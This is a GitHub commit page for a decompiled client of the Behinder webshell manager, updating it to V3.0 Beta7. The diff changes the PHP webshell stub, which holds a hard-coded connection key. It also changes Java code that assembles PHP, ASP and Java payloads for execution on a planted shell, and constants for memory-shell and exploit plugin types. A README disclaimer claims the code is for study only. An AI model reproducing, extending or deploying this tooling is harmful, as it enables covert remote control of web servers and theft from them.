Skip to content

Commit

Permalink
更新至V3.0 Beta7,并且修复原版“虚拟终端”无法输入命令的问题
Browse files Browse the repository at this point in the history
  • Loading branch information
zhanghaishan committed Apr 11, 2021
1 parent 73b2179 commit ca51c4e
Show file tree
Hide file tree
Showing 518 changed files with 5,359 additions and 914 deletions.
6 changes: 6 additions & 0 deletions README.md
View file
Original file line number Diff line number Diff line change
@@ -1,6 +1,11 @@
# 冰蝎客户端源码
首先致敬作者rebeyond:https://github.com/rebeyond/Behinder/releases

# 更新内容
```
2021-04-11 逆向V3.0 Beta7 并且修复原版虚拟终端无法输入命令问题
```

# 郑重声明
拿刀的不一定是屠夫,也有可能是伙夫,当然也有可能是大夫,本代码仅供学习,请保证必须一定勿用于非法用途!!!

Expand All @@ -11,6 +16,7 @@

3.server目录下是服务端小马程序。


# 分支
本git的分支对标原版程序版本号。

Expand Down
4 changes: 4 additions & 0 deletions pom.xml
View file
Original file line number Diff line number Diff line change
Expand Up @@ -136,6 +136,10 @@
<include>**/*.gif</include>
<include>**/*.asp</include>
<include>**/*.php</include>
<include>**/*.jar</include>
<include>**/*.32</include>
<include>**/*.64</include>
<include>**/*.bak</include>
</includes>
<filtering>true</filtering>
</resource>
Expand Down
1 change: 1 addition & 0 deletions server/shell.php
View file
Original file line number Diff line number Diff line change
Expand Up @@ -3,6 +3,7 @@
session_start();
$key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
$_SESSION['k']=$key;
session_write_close();
$post=file_get_contents("php://input");
if(!extension_loaded('openssl'))
{
Expand Down
17 changes: 16 additions & 1 deletion src/main/java/net/rebeyond/behinder/core/Constants.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -2,7 +2,7 @@

public class Constants {
public static String[] userAgents = new String[]{"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (iPhone; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/84.0.4147.122 Mobile/15E148 Safari/604.1", "Mozilla/5.0 (iPad; CPU OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/84.0.4147.122 Mobile/15E148 Safari/604.1", "Mozilla/5.0 (iPod; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/84.0.4147.122 Mobile/15E148 Safari/604.1", "Mozilla/5.0 (Linux; Android 10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Mobile Safari/537.36", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36", "Mozilla/5.0 (iPhone; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/84.0.4147.122 Mobile/15E148 Safari/604.1", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0", "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0", "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0", "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0", "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0", "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)", "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko", "Mozilla/5.0 (Windows NT 6.2; Trident/7.0; rv:11.0) like Gecko", "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"};
public static String VERSION = "v3.0 Beta 6 ";
public static String VERSION = "v3.0 Beta 7 ";
public static int MENU_CUT = 1;
public static int MENU_COPY = 16;
public static int MENU_PASTE = 256;
Expand All @@ -27,5 +27,20 @@ public class Constants {
public static int PLUGIN_TYPE_EXPLOIT = 1;
public static int PLUGIN_TYPE_TOOL = 2;
public static int PLUGIN_TYPE_OTHER = 3;
public static int OS_TYPE_WINDOWS = 0;
public static int OS_TYPE_LINUX = 1;
public static int OS_TYPE_UNIX = 2;
public static int OS_TYPE_MAC = 3;
public static int HISTORY_DIRECTION_UP = 0;
public static int HISTORY_DIRECTION_DOWN = 1;
public static int SHELL_STATUS_ALIVE = 0;
public static int SHELL_STATUS_DEAD = 1;
public static int LIST_STAGE_STARTED = 0;
public static int LIST_STAGE_DONE = 1;
public static int LIST_STAGE_FAIL = 2;
public static int MEMSHELL_TYPE_FILE = 0;
public static int MEMSHELL_TYPE_AGENT = 1;
public static int MEMSHELL_TYPE_FILTER = 2;
public static int MEMSHELL_TYPE_SERVLET = 3;
public static String[] cookieProperty = new String[]{"expires", "max-age", "domain", "path", "secure", "httponly", "samesite"};
}
39 changes: 33 additions & 6 deletions src/main/java/net/rebeyond/behinder/core/Params.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -3,8 +3,12 @@
import com.sun.org.apache.xerces.internal.impl.dv.util.Base64;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.util.ArrayList;
import java.util.Iterator;
import java.util.List;
import java.util.Map;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import net.rebeyond.behinder.utils.ReplacingInputStream;
import net.rebeyond.behinder.utils.Utils;
import org.objectweb.asm.ClassAdapter;
Expand Down Expand Up @@ -62,7 +66,7 @@ public static byte[] getParamedAssembly(String clsName, Map params) throws Excep
String paramValue;
for(Iterator var6 = params.keySet().iterator(); var6.hasNext(); paramsStr = paramsStr + paramName + ":" + paramValue + ",") {
paramName = (String)var6.next();
paramValue = Base64.encode(((String)params.get(paramName)).toString().getBytes());
paramValue = Base64.encode(((String)params.get(paramName)).toString().getBytes("UTF-8"));
}

paramsStr = paramsStr.substring(0, paramsStr.length() - 1);
Expand Down Expand Up @@ -117,19 +121,42 @@ public static byte[] getParamedPhp(String clsName, Map params) throws Exception
bis.close();
code.append(bos.toString());
String paraList = "";
Iterator var9 = getPhpParams(code.toString()).iterator();

String paraName;
for(Iterator var9 = params.keySet().iterator(); var9.hasNext(); paraList = paraList + ",$" + paraName) {
paraName = (String)var9.next();
String paraValue = (String)params.get(paraName);
code.append(String.format("$%s=\"%s\";", paraName, paraValue));
while(var9.hasNext()) {
String paraName = (String)var9.next();
if (params.keySet().contains(paraName)) {
String paraValue = (String)params.get(paraName);
code.append(String.format("$%s=\"%s\";", paraName, paraValue));
paraList = paraList + ",$" + paraName;
} else {
code.append(String.format("$%s=\"%s\";", paraName, ""));
paraList = paraList + ",$" + paraName;
}
}

paraList = paraList.replaceFirst(",", "");
code.append("\r\nmain(" + paraList + ");");
return code.toString().getBytes();
}

public static List getPhpParams(String phpPayload) {
List paramList = new ArrayList();
Pattern mainPattern = Pattern.compile("main\\s*\\([^\\)]*\\)");
Matcher mainMatch = mainPattern.matcher(phpPayload);
if (mainMatch.find()) {
String mainStr = mainMatch.group(0);
Pattern paramPattern = Pattern.compile("\\$([a-zA-Z]*)");
Matcher paramMatch = paramPattern.matcher(mainStr);

while(paramMatch.find()) {
paramList.add(paramMatch.group(1));
}
}

return paramList;
}

public static byte[] getParamedAsp(String clsName, Map params) throws Exception {
String basePath = "net/rebeyond/behinder/payload/asp/";
String payloadPath = basePath + clsName + ".asp";
Expand Down
3 changes: 0 additions & 3 deletions src/main/java/net/rebeyond/behinder/core/PluginTools.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -53,7 +53,6 @@ public void sendTask(String pluginName, String paramStr) throws Exception {
this.statusLabel.setText(msg);
});
} catch (Exception var7) {
var7.printStackTrace();
Platform.runLater(() -> {
this.statusLabel.setText("插件运行失败");
});
Expand All @@ -80,7 +79,6 @@ public void sendTaskBackground(String pluginName, Map params, PluginSubmitCallBa
String msg = resultObj.getString("msg");
callBack.onPluginSubmit(status, msg);
} catch (Exception var8) {
var8.printStackTrace();
callBack.onPluginSubmit("fail", var8.getMessage());
}

Expand Down Expand Up @@ -125,7 +123,6 @@ public void getTaskResult(String pluginName) {

});
} catch (Exception var8) {
var8.printStackTrace();
Platform.runLater(() -> {
this.statusLabel.setText("结果刷新失败:" + var8.getMessage());
});
Expand Down
Loading

0 comments on commit ca51c4e

Please sign in to comment.